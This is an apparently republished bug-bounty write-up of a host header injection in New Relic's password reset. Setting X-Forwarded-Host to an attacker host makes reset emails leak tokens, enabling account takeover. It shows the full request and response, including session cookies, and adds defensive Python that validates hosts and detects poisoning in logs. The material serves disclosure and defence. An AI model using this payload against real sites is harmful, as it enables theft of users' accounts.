Using Host Header Injection for Account Takeover

admin · 2024-04-23 06:39:03

Business context

The affected feature is the password reset flow.

Steps to reproduce

  • Open the password reset page: https://login.newrelic.com/passwords/forgot

  • Enter the victim's email address, then click "Reset and email password"

  • Intercept the HTTP request in Burp Suite, add an X-Forwarded-Host header and set it to something like:

attacker.com/.newrelic.com

The reset link in the email then looks like this:

https://testing-now.000webhostapp.com/.newrelic.com/passwords/reset/a248d8b06e7b25a116859729cbc0e07e180d9fb197dadc04f30185512eecc811

The victim receives this malicious link in their email; when they click it, the request carries the user's password reset link/token to the attacker's host, which leads to a full account takeover.

The request looked like this:

POST /passwords/forgot HTTP/1.1
Host: login.newrelic.com
X-Forwarded-Host: testing-now.000webhostapp.com/.newrelic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 626
Connection: close
Referer: https://login.newrelic.com/passwords/forgot
Cookie: _ga=GA1.2.1721374031.1568844736; ajs_user_id=null; ajs_group_id=null; _gcl_au=1.1.1636905160.1568844739; ei_client_id=5d82b02df99b140010808282; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1568844750536-52713; _fbp=fb.1.1568844751467.1905354417; qca=P0-625668904-1568844751500; optimizelyEndUserId=oeu1568844783430r0.2931045891390677; ajs_anonymous_id=%22b1e86a3a-04a1-48f5-a1c9-37167a1991c8%22; s_fid=78F091CDC3B81C9E-153BD36510D98B56; intercom-id-cyym0u3i=9a67a50f-33f2-4fdb-b74f-7e8d058de750; adroll_fpc=8e6e5aa9e24ca0efac425a4b2c6d4c4e-s2-1568844790580; __ar_v4=YCNZVXZ6TJDJ3KMJRVGKFH%3A20190918%3A3%7CI7ZJI4CQMBCNHGOQ27AYQZ%3A20190918%3A3%7CDLQZ5QQWIFBZZM5ECJME6X%3A20190918%3A3; _golden_gate_session=DlKqVDqbL%2B6%2Fi298zevCA1yH1PgkIDlWIgCVNuUC2CbfqR55ZnQKWXdh8nIl2F3kP4u%2BC9gLAfxsg6jOWfPwuQVDa0GcDhR6VoddruVbqMGjdogry5tZvDs7K8BZkCVH49Z8KHpTXRAv7DJIjEePjX4LcqtNJzRs65Fm6Y97sFIzI4Hvm081ptYeD0Nk543GaLZMtTnT98Rgdu2nftfEV7PrfmqnXKUR%2FDHhVX%2BPjI0qjGZ3PyL3UX9EigZ%2BMcEFiFGPzQXKSW%2BAiVG4Y71rQBOfwm%2FlSz%2B8RGJ0WfEoL%2BBRDquU1w%2BOPxA2r3u8sU02xG4dg07nZeo%3D--SewvpLvUIyY0YJTh--bWuTrIMZhXu6MP8PDg2iZA%3D%3D
Upgrade-Insecure-Requests: 1

The response was:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 134
Content-Type: text/html; charset=utf-8
Date: Fri, 20 Sep 2019 00:49:19 GMT
Location: https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot
Server: nginx
Set-Cookie: _golden_gate_session=Awolm37t0RVohChn8c%2FTtEpVzRz%2BYUXP%2FC6eqVDXqoY7IHMmItXq6vRR%2FLr45q31mXIOFUemqprmptlEuI2mIRy5ZN84OGsjWJWIUnZ34e0ve4IJf0Iqjh%2BbnsP0elEXQ%2B7gm12%2FRlfO4KSXZl7kkKcMrECZo8jQ%2B2SzO9cfYA6DcqNP%2BxlJkqQmQuF8eRXBqGwisVdIBtYqzHLzJDl6n7cZoXW9EyX%2FPMOAuJ3YlxUFoomKE6Z2%2BfgmCKPxeEQRtne%2BvtTJH5xzvNUnyN3JTSNVo4y47xZvjcnYLPzdW1vhptWGxtiyF99zy%2BCqrj11VlLz5PA4Idf0H8OmTqLvzVT42C40SN8qRtz1jP%2BhDjuwDsAr9aDabjj4O41F7AoivfsBXf0vJanmXOmllZXqRiLmiV81nTAEOi5S8EBDbkT3TLrkIu1Uuo2TdkXCDQXyasWXzg%2F1zRI08xOgr6IgdOJhxbZy6Se2ToIMbsYRA532mzLKFXPq2xCIU%2FTuEWdFyXbk4w%2Bo5qH6z21Qqibl32S7VgkN%2Fc61SYJcyipdyJsWWKT6lhHnv%2BHeCGi4OoE3wonpFRm9Z7pNDh%2BamsTtBUOCQgJeNYYnyz35Ggeueeo%2BVYqC46qNpedWs%2B9vXIH%2FRVQguzv9rfU%3D--MxbKlXOo06QW75kP--4a4Glp1aMgEoV2XXukgnIA%3D%3D; path=/; HttpOnly; secure; SameSite=Lax
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: DENY
X-Permitted-Cross-Domain-Policies: none
X-Request-Id: ec1ad038-4b96-4915-b107-3422151a3ab1
X-Runtime: 0.113080
X-Xss-Protection: 1; mode=block
Connection: close
<html><body>You are being <a href="https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot">redirected</a>.</body></html>
look at attachments
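As an added example (not code from the original report or from New Relic), the following Python models the behaviour shown above from the defender's side: the flawed link builder that trusts X-Forwarded-Host, a hardened builder that validates both host headers and derives the link from a fixed origin, and a check that flags poisoning attempts in access logs. The canonical origin, allowlist, and the xfh="..." log field format are assumptions for this example.

```python
import re
from urllib.parse import urlsplit

# Assumed values for this example: the canonical origin reset links must use,
# and the only hostnames the application should ever accept for itself.
CANONICAL_ORIGIN = "https://login.newrelic.com"
ALLOWED_HOSTS = {"login.newrelic.com"}
RESET_PATH = "/passwords/reset/"

def host_is_allowed(value):
    """True only if value is exactly an allowlisted hostname (optional port)."""
    if not value:
        return False
    try:
        parts = urlsplit("//" + value)
    except ValueError:
        return False
    if parts.path or parts.query or parts.fragment or parts.username is not None:
        return False  # "attacker.com/.newrelic.com" or "a@b" style values land here
    return (parts.hostname or "").lower() in ALLOWED_HOSTS

def vulnerable_reset_url(headers, token):
    """Reproduces the observed behaviour: the forwarded host is trusted verbatim."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host", "")
    return f"https://{host}{RESET_PATH}{token}"

def safe_reset_url(headers, token):
    """Hardened: validate both host headers, then build the link from a fixed origin."""
    if not host_is_allowed(headers.get("Host")):
        raise ValueError("rejected Host header")
    forwarded = headers.get("X-Forwarded-Host")
    if forwarded is not None and not host_is_allowed(forwarded):
        raise ValueError("rejected X-Forwarded-Host header")
    return f"{CANONICAL_ORIGIN}{RESET_PATH}{token}"

# Constructed access-log lines (assumed format: the proxy logs X-Forwarded-Host as xfh="...").
SAMPLE_LOG = [
    '2019-09-20T00:49:19Z POST /passwords/forgot host="login.newrelic.com" xfh="-"',
    '2019-09-20T00:49:20Z POST /passwords/forgot host="login.newrelic.com" xfh="testing-now.000webhostapp.com/.newrelic.com"',
    '2019-09-20T00:49:21Z POST /passwords/forgot host="login.newrelic.com" xfh="login.newrelic.com"',
]

def find_poisoning_attempts(lines):
    """Return log lines whose X-Forwarded-Host is present but not allowlisted."""
    hits = []
    for line in lines:
        m = re.search(r'xfh="([^"]*)"', line)
        if m and m.group(1) != "-" and not host_is_allowed(m.group(1)):
            hits.append(line)
    return hits
```

Rails applications get the same protection from the hosts allowlist (config.hosts), but the reset link must still be built from a configured origin rather than from request headers.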

Originally published on the WeChat public account 迪哥讲事: Using Host Header Injection for Account Takeover

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching; readers who use this information for any other purpose bear full legal and joint liability, and this site assumes none. For questions, contact us by email (preferably from a corporate or otherwise valid mailbox so that the message is not blocked; contact details are on the home page).
Posted by admin on 2024-04-23 06:39:03. Please retain this link when reposting (CN-SEC中文网, with thanks to the original author): http://cn-sec.com/archives/2086750.html